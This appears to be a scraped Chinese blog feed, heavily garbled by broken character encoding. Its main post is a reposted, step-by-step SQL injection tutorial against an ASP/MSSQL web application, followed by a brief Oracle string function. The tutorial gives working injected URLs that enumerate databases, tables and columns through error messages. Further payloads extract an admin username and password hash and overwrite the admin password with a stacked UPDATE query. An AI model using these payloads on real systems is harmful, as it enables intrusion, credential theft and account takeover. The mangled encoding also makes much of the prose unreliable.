??xml version="1.0" encoding="utf-8" standalone="yes"?>综合久久十次,av片在线看,国产精品999999http://www.aygfsteel.com/fadesea/articles/35361.htmlfadeseafadeseaWed, 15 Mar 2006 02:37:00 GMThttp://www.aygfsteel.com/fadesea/articles/35361.htmlhttp://www.aygfsteel.com/fadesea/comments/35361.htmlhttp://www.aygfsteel.com/fadesea/articles/35361.html#Feedback0http://www.aygfsteel.com/fadesea/comments/commentRss/35361.htmlhttp://www.aygfsteel.com/fadesea/services/trackbacks/35361.htmlsysdatabases

MSSQL中对sysdatabasespȝ?的说明:
Microsoft SQL Server 上的每个数据库在表中占一行。最初安?SQL Server Ӟsysdatabases 包含 master、model、msdb、mssqlweb ?tempdb 数据库的V该表只存储?master 数据库中?

q个表保存在master数据库中Q这个表中保存的是什么信息呢Q这个非帔R要。他?
保存了,所有的库名,以及库的IDQ和一些相关信息?
q里我把对于我们有用的字D名U和相关说明l大家列出来.看好咯!

name dbid
//表示库的名字. //表示库的ID.

dbid??是系l的。分别是Qmaster、model、msdb、mssqlweb、tempdb q五个库.

我们利用SQL语句Qselect * from master.dbo.sysdatabases 可以查询出所有的库名.


sysobjects

MSSQL中对sysobjectspȝ表的说明Q?
在数据库内创建的每个对象Q约束、默认倹{日志、规则、存储过E等Q在表中占一行。只有在 tempdb 内,每个临时对象才在该表中占一行?

q个是列出数据库对象的系l表。当然数据库表名也在里面?
q里我就为大家列Z些对我们有用的字D名U和相关说明.
name id xtype uid
对象? 对象ID 对象cd 所有者对象的用户ID?

对象cd(xtype)。可以是下列对象cd中的一U:
C = CHECK U束
D = 默认值或 DEFAULT U束
F = FOREIGN KEY U束
L = 日志
FN = 标量函数
IF = 内嵌表函?
P = 存储q程
PK = PRIMARY KEY U束Q类型是 KQ?
RF = 复制{选存储过E?
S = pȝ?
TF = 表函?
TR = 触发?
U = 用户?
UQ = UNIQUE U束Q类型是 KQ?
V = 视图
X = 扩展存储q程

当然我们q里只用得到xtype='U'的倹{当{于U的时候,对象名就是表名,对象ID是表的ID?

我们利用SQL语句: select * from ChouYFD.dbo.sysobjects where xtype='U' q样可以列出库名称是:ChouYFD中所有的表名.

syscolumns

SQL中syscolumnspȝ表的说明Q?
每个表和视图中的每列在表中占一行,存储q程中的每个参数在表中也占一行。该表位于每个数据库中?

q个是列出一个表中所有的字段列表的系l表?
q里我就为大家列Z些对我们有用的字D名U和相关说明:
name id colid
//字段名称 //表ID? 字段ID?

其中?ID ?刚上我们用sysobjects得到的表的ID?
我们利用SQL语句: select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFDq个库中Q表的ID?23456789中的所有字D列?
YES SIR 明白QGO GO GO !!!

好了,单的介绍了一下这个用?大家如果有不了解?h看SQL相关说明.

二、灵zd用系l表
同志们,玩过CS游戏的D手,呵呵Q都玩过啊。好Q我们今天也要来爆一??.
GO GO GO Q!Q?
不过我们现在爆的是库名,表名Q字D名,我们用不着ȝ库名Q表名,字段?
说一下怎么爆出相关的库名,表名Q字D名.
当两个类型g一L时候,他们做比较,SQLpȝ会提C出错。ƈ且会昄出类型的? 如:’aaa?gt;100 q样比较Q也是字符串和数字的比较,q个怎么比较嘛,pȝ当然会提C出错啦Q大安知道只有相同cd的时候才可以q行q算.所以这里我们就来一个反方向的不相同cd比较Q爆Z的?

下面p我们来测试吧Q!Q准备好没有QGOQ?

d一Q得到所有库?
http://www.AAA.com/jump.asp?id=3400 and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

因ؓ dbid 的g1?Q是pȝ用了。所以用戯己徏的一定是?开始的。ƈ且我们提交了 name>1 NAME字段是一个字W型的字D和数字比较会出?那我们提交看一下IEq回了什么?

IEq回.

Microsoft OLE DB Provider for SQL Server 错误 '80040e07'

?nvarchar ?'Northwind' 转换为数据类型ؓ int 的列时发生语法错误?

/jump.aspQ行33

GOOD!!!q样把NAME字段的值爆露出来了: Northwind. 也就是我们得C一个库?
改变DBID的?我们可以得出所有的库名.当DBID{于10,11的时候,爆出了两个论坛的库名.分别?
bbs2002
bbs

呵呵Q论坛的库名出来啦!Q!那我们就不客气了。就找BBSq个库吧!

d二:得到bbsq个库中所有的表名.
先来W一句:
http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')
查询的SQL语句,q回的是NAME的值然后和数字0比较,q样׃爆露出NAME的?
好我们提交吧,只听到砰的一壎ͼ一个表?name的?出来了。名叫:Address.
// q里多说两句话,如果你提交的时候,他说你没有权限,p明,q两个库的SQL?
//L权限不一P那就攑ּ吧。你没有资格q行下去. 老兄攑ּ吧!{他更新账号?
//的时候,我第一旉通知你!一定要怿我臭要饭的!?

好,再来接着爆其他的?
http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address'))
又出来一个表名,名叫Qadmin

依次提交 ... and name not in('address','admin',..)) 可以查出所有的表名.

好,现在我们得到了ADMINq个表,大家都清楚了q个表是做什么的吧!Q我们的目的是要得到这个表中̎号字D和密码字段的倹{?
下面是要得到这个表中的所有字D名了咧Q?怎么得到字段名呢?pȝ? syscolumns
中有用字Dؓ: name?id、colid 其中ID是保存着表的ID。也是说我们要得到表的IDL后,用SELECT * from bbs.dbo.syscolumns where id=bbs表的ID q样才能列出BBSq个表中所有的字段. 说了半天Q哎Q说不清楚了。看我表演吧Q?

http://www.AAA.com/jump.asp?id=3400 and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))
//把IDD{成字W型后再和一个整型值比较。我KAO。经典吧Q呵呵,q也惛_出来?
又听到砰的一壎ͼID号出来了。gؓQ?73577794
OK.GOOD!! q入下关吧?

d三:得到ADMINq个表中的所有字D列表:
http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794)
又是把NAME和数字比?

IE q回Qadduser 呵呵Q来来来?
http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794 and name not in('adduser'))
又返回一个字D名Qflag
http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794 and name not in('adduser','flag'))

好当提交刎ͼ
http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 name from BBS.dbo.syscolumns
where id=773577794 and name not in('adduser','flag','id','lastlogin','lastloginip','password','username'))

IEq回QBOF ?EOF 中有一个是"?Q或者当前的记录已被删除Q所需的操作要求一个当前的记录?
说明Q我们已l猜完了。呵呵,看到了吧?
把BBS库中的ADMIN表中的所有字D列出来了?
分别如下Q?
adduser,adduser,flag,id,lastlogin,lastloginip,password,username
看了一下,很像动网的论坛?

d四:查询字段?
来。我们看看username和password的值吧?

http://www.AAA.com/jump.asp?id=3400 and 0<(select id from BBS.dbo.admin where username>1)
账号出来了:youbiao

http://www.AAA.com/jump.asp?id=3400 and 0<(select id from BBS.dbo.admin where password>1 and username='youbiao')
密码又出来了Qd6b2f32a47b8bcb5 我的天MD5的!不怕,呵呵~Q!Q?

来。改一下他的密?
http://www.AAA.com/jump.asp?id=3400;update BBS.dbo.admin set password='AAABBBCCCDDDEEEF' where username='youbiao';--
呵呵Q试试。成功了。我们再来给他改回来.

http://www.AAA.com/jump.asp?id=3400;update BBS.dbo.admin set password='d6b2f32a47b8bcb5' where username='youbiao';--
又改回来咯!Q!呵~Q?


通过提交UPDATE语句可以直接把密码l他更改了?BR>                                                                                          转自Q作者:YTT 来源Qhttp://www.HackBase.com

fadesea 2006-03-15 10:37 发表评论
]]>Oracle字符串操?/title><link>http://www.aygfsteel.com/fadesea/articles/34307.html</link><dc:creator>fadesea</dc:creator><author>fadesea</author><pubDate>Wed, 08 Mar 2006 09:34:00 GMT</pubDate><guid>http://www.aygfsteel.com/fadesea/articles/34307.html</guid><wfw:comment>http://www.aygfsteel.com/fadesea/comments/34307.html</wfw:comment><comments>http://www.aygfsteel.com/fadesea/articles/34307.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.aygfsteel.com/fadesea/comments/commentRss/34307.html</wfw:commentRss><trackback:ping>http://www.aygfsteel.com/fadesea/services/trackbacks/34307.html</trackback:ping><description><![CDATA[<P>oracle中有ltrim,rtrim和trim用于L字符串首I格。如何去掉字W串中间I格呢?/P> <P>q个例子用于L字符串中的空|我把它写成了一个函数现在脓出来<BR></P> <P><FONT color=#0000ff>create or replace function REP_SPE(inp in VARCHAR2) return varchar2 is<BR>  Result number;<BR>  tmp int;<BR>  ls varchar2(30);<BR>  rs varchar2(30);<BR>  <BR>begin<BR>  tmp:=INSTR(inp,' ');<BR>  ls:=trim(substr(inp,1,tmp));<BR>  rs:=trim(SUBSTR(inp,tmp));<BR>  Result:=ls||rs;<BR>  return(Result);<BR>end REP_SPE;</FONT><BR></P><img src ="http://www.aygfsteel.com/fadesea/aggbug/34307.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.aygfsteel.com/fadesea/" target="_blank">fadesea</a> 2006-03-08 17:34 <a href="http://www.aygfsteel.com/fadesea/articles/34307.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss> <footer> <div class="friendship-link"> <a href="http://www.aygfsteel.com/" title="狠狠久久亚洲欧美专区_中文字幕亚洲综合久久202_国产精品亚洲第五区在线_日本免费网站视频">狠狠久久亚洲欧美专区_中文字幕亚洲综合久久202_国产精品亚洲第五区在线_日本免费网站视频</a> </div> </footer> վ֩ģ壺 <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">¤</a>| <a href="http://" target="_blank">ɽ</a>| <a href="http://" target="_blank">ͨ</a>| <a href="http://" target="_blank">ͨ</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">˹</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">¹Ȫ</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">ŷ</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">ͼľ</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">̨</a>| <a href="http://" target="_blank">ˮ</a>| <a href="http://" target="_blank">˳</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">ɽ</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">Ϫ</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">ʯ</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">â</a>| <a href="http://" target="_blank">ͬ</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">峣</a>| <a href="http://" target="_blank">ѽ</a>| <a href="http://" target="_blank">Ƥ</a>| <a href="http://" target="_blank">뵺</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">ƽ</a>| <a href="http://" target="_blank"></a>| <script> (function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })(); </script> </body>